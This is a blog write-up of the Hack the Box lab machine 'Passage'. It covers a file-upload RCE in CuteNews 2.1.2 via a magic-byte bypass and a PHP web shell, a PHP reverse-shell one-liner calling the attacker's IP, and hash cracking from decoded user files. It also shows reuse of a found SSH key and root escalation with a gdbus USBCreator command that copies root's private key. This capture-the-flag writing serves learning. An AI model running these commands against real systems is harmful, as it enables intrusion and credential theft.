This is a write up of Passage on Hack the Box.
As always, we start with our basic Nmap scans. The results are below:
nux@KakaLinpoop:~/Documents/htb/boxes/passage/nmap$ nmap -T4 10.10.10.206 -p 22,80 -sC -oN scriptScans Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-18 21:20 CDT Nmap scan report for 10.10.10.206 Host is up (0.070s latency). PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA) | 256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA) |_ 256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519) 80/tcp open http |_http-title: Passage News
Port 80 – HTTP
Good ol' HTTP. It's just a news feed called "Passage News." The noteworthy bit I see is "Implemented Fail2Ban." According to the post related to that, it seems we probably shouldn't attempt to bruteforce the site. Guess GoBuster is out of the question for now (Unless we find a workaround). Attacking the server will result in a two-minute ban. We also checked for robots.txt. No luck there, either.
Here's the text of the post mentioning Fail2Ban:
18 Jun 2020 By admin 0 Comments
Due to unusally large amounts of traffic, we have implementated Fail2Ban on our website. Let it be known that excessive access to our server will be met with a two minute ban on your IP Address. While we do not wish to lock out our legitimate users, this decision is necessary in order to ensure a safe viewing experience. Please proceed with caution as you browse through our extensive news selection.
We see a few emails in the source code. It may be worth pulling them for later:
curl -X GET http://10.10.10.206/ >> stuff.txt
Then we can use cut and sort to pull the names themselves:
cat stuff.txt | egrep "@" | cut -d ":" -f 2 | cut -d "@" -f 1 | sort | uniq > names
Here we are:
kim nadav paul sid
Maybe these will be useful later.
If I want to go further, I can create a separate list for emails:
cat stuff.txt | egrep "@" | cut -d ":" -f 2 | cut -d '"' -f 1 | sort | uniq > emails
That creates the following list:
firstname.lastname@example.org email@example.com firstname.lastname@example.org email@example.com
I'd wager that the ones that matter are the ones that say "@passage", so we can grep that out and we will have:
http://10.10.10.206/index.php?id=2, I also find some other names. All of them except for James (with no last name) appear to be game designers (probably not relevant, but an interesting tidbit of info):
- Sid Meier
- Kim Swift
I will add James to the list of names.
We can also see that the site is powered by something called "Cute News." Searching for that takes me here. We might have to research that a bit.
Looking up some vulnerabilities
We can search around for CuteNews vulnerabilities. Here's an interesting one for CuteNews 2.1.2, and it's RCE. Medium has a post about it here.
That's cool, but we don't know yet if this is the vulnerable version, and we need a valid login to access it. Let's see what we can find.
Seems the default login page is
/CuteNews. We can also check it out on GitHub if you're curious.
Finding CuteNews was a bit lucky, because I found it on the Medium blog post linked above. Luckily, it also lists the version, which in this case is in fact 2.1.2.
The version number is near the bottom of the screenshot "Powered by CuteNews 2.1.2."
What we have so far
Some possible usernames:
kim nadav paul sid james admin
A login page. We also have to be careful not to lock ourselves out.
I tested those names with a few default-type passwords (password, password123, admin, etc.).
Eventually I tried with Burp Intruder, and got nothing. Then, I realized I was over complicating it. There's an option to create a user. On a whim, I tried it.
Amazingly, this worked, and gave me the file upload option I needed. Initially, I used the name Kim, thinking that it would tell me the user already existed. It didn't. It just created the user and gave me access.
Now, I log in with me newly-created user and I see my initial login page:
Now, click on "Personal Options."
We look back the entry on ExploitDB: https://www.exploit-db.com/exploits/48458
We can upload a PHP shell as our "Avatar." I tend to use my favorite, phpbash. If you drop it on the box, it actually won't work. There's a file check. We can usually bypass these sorts of checks with the Magic Byte. So now we simply add:
GIF8; to the first line of the file. Now we upload it and click "view image"
We are redirected to:
Now we have a basic shell. From there, I set up a reverse shell so I can begin the process of upgrading it. I use my super-derpy EZShellz tool to make this easier:
python3 ezshell.py -i 10.10.14.46 -p 4444 -l php [+] PHP Reverse shell: php -r '$sock=fsockopen("10.10.14.46",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
It's automatically added to my clipboard, so I start my listener and paste the output to the terminal of the victim machine. Easy work.
Eventually, through extensive enumeration, we find a directory called users:
There are a bunch of PHP files in there. We can cat them out and they look something like this:
<?php die('Direct call - access denied'); ?> YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319<?php die('Direct call - access denied'); ?> YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODgyOTgzMztzOjY6ImVncmU1NSI7fX0=<?php die('Direct call - access denied'); ?> == Cut down for space == YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzMwOTtzOjk6ImtpbS1zd2lmdCI7fX0=
I removed all the instances of that php error message "access denied" to give me only the base64-encoded strings.
Now I decode the strings:
cat b64Text | base64 -d > decoded
We can also use the following one-liner:
cat * | grep -v "denied" | base64 -d > output.txt
This gives us some users and hashes we can try to crack.
There's no really quick way to do this. We just have to grab the hashes and pass them to a hashcracker. I use Crackstation for CTF-type challenges (Never for real engagements).
Eventually, we will find one we can use:
That gives us the following password:
So now we have:
SSH failed, because we need a key, so we will simply run the switch user command:
www-data@passage:/var/www/html/CuteNews/cdata/users$ su paul Password: paul@passage:/var/www/html/CuteNews/cdata/users$ id uid=1001(paul) gid=1001(paul) groups=1001(paul)
Awesome. We are now paul.
Paul has a private key for user nadav stored in his .ssh folder. We can copy that private key over to our box and ssh in as nadav. (use
-i to specify the private key) Now we SSH in as nadav.
Next, we have to figure out how to become root.
Enumerating the machine, I eventually came to gdbus. This is another tricky one where I just happened to Google the right thing after hours of searching and a bit of help from a friend who had worked on it a day or two before. I think he said "ride the bus."
There are a few writeups going over privesc with gdbus:
Figure 10 on this guide https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/ pretty much sums it up.
I hopped on over to /var/tmp and created a directory called woop just to work out of. Then I ran the following:
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /var/tmp/woop/derp true
Anyway, we are granted a private key with the filename "derp." Now we use that to ssh into the server.
I was feeling lazy, so I just did this while sitting in the directory I'd copied the file from.
nadav@passage:/var/tmp/woop$ ssh firstname.lastname@example.org -i derp The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. ECDSA key fingerprint is SHA256:oRyj2rNWOCrVh9SCgFGamjppmxqJUlGgvI4JSVG75xg. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts. Last login: Mon Aug 31 15:14:22 2020 from 127.0.0.1 root@passage:~#
You can also kinda do it as a one-liner for funsies:
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /var/tmp/woop/derp true && ssh email@example.com -i derp -y () Last login: Tue Mar 9 19:49:08 2021 from 127.0.0.1 root@passage:~#
A note on this box
So, as always, I'm late. I am kinda lame like that, but this blog is really just a side thing I do for my own learning. That said, there's only a little bit of value in my putting together these writeups. I think I want to put together a couple more posts where I go over the initial foothold and privesc in a little more detail, so I can go over what I actually learned rather than just be like, "Yo. Here's a write up. Peace!"